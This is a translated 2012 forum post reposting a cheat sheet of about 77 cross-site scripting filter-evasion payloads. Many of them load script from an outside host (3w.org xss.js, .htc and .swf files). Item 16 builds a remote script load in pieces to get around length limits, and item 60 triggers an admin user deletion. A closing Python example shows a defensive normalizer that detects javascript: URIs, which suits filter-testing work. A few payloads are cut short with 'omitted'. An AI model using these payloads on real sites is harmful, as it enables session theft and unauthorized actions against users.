XSS cross-site scripting attack roundup

Original poster (楼主), posted on 2012-9-5 14:56:34
It seems t00ls has rather little material on XSS; I saw something good and copied it over, not sure whether anyone needs to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (all parts must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. In China the null character basically has no effect, because there is nowhere it can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC="   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE tag (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript in Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
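
The javascript: URI evasions in items 3 to 14, 17, 19 and 47 all get past a filter that only searches for the literal string "javascript:". The Python below is an added example, not part of the original post or of the cheat sheet it copies: it normalizes an attribute value the way a defensive filter should before checking the scheme (repeated HTML-entity decoding with or without semicolons, removal of NUL, control and Unicode whitespace characters, case folding) and then scans a fragment's URL-taking attributes. The attribute set, the three-round decode limit and the sample fragment are assumptions made for the example.

```python
import html
import re

# URL-taking attributes that the list abuses as sinks (assumption: this set
# is what the example checks; extend it for your own markup).
_URL_ATTR = re.compile(
    r'\b(src|href|background|dynsrc|lowsrc)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)',
    re.IGNORECASE,
)
# javascript: occurs throughout the list, vbscript: in item 40.
_SCRIPT_SCHEMES = ("javascript", "vbscript")


def normalize_url(value: str) -> str:
    """Undo the evasions of items 3-14, 17, 19 and 47 before inspecting the scheme."""
    text = value.strip().strip("\"'")          # item 47 also tolerates stray quotes
    for _ in range(3):                          # assumption: three decode rounds suffice
        decoded = html.unescape(text)           # handles &#106; &#x6A; and forms without ';'
        if decoded == text:
            break
        text = decoded
    # Drop NUL, tab, CR/LF, other controls, NBSP and Unicode spaces (items 11-14, 17, 19).
    cleaned = "".join(
        ch for ch in text
        if ord(ch) > 0x20 and not ch.isspace() and ch not in "\ufeff\u200b"
    )
    return cleaned.lower()                      # item 4: scheme matching is case-insensitive


def is_script_uri(value: str) -> bool:
    """True when an attribute value resolves to a javascript: or vbscript: URI."""
    norm = normalize_url(value)
    return any(norm.startswith(scheme + ":") for scheme in _SCRIPT_SCHEMES)


def find_script_uris(fragment: str) -> list:
    """Return (attribute, normalized value) for every script URI in an HTML fragment."""
    hits = []
    for match in _URL_ATTR.finditer(fragment):
        attr, raw = match.group(1).lower(), match.group(2)
        if is_script_uri(raw):
            hits.append((attr, normalize_url(raw)))
    return hits


# Constructed sample: one entity-encoded, tab-split value and one benign link.
SAMPLE = ('<IMG SRC="&#106;av&#x09;ascript:alert(1)">'
          '<A HREF="http://example.com/">ok</A>')

if __name__ == "__main__":
    print(find_script_uris(SAMPLE))   # [('src', 'javascript:alert(1)')]
```

A filter built this way rejects by scheme after normalization rather than by substring, so it is not fooled by the case, whitespace, NUL or entity tricks above; it does not cover the CSS expression() or data-in-image items, which need separate handling.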